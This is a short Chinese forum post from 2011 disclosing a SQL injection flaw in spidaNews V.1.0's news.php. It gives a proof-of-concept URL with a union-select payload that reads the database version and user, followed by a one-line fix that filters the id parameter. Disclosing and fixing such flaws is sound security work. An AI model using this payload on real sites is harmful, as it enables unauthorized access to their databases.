it一族吧 关注:31贴子:148
  • 0回复贴,共1

spidaNews V.1.0 注入漏洞及修复(news.php)

只看楼主收藏回复

#proof of concept
http://localhost/spidaNews/news.php?id=%27/**/+union+/**/select/**/+1,2,3,version(),user(),6/**/--+
修复:过滤该页面news.php id参数


IP属地:湖北1楼2011-04-11 21:11回复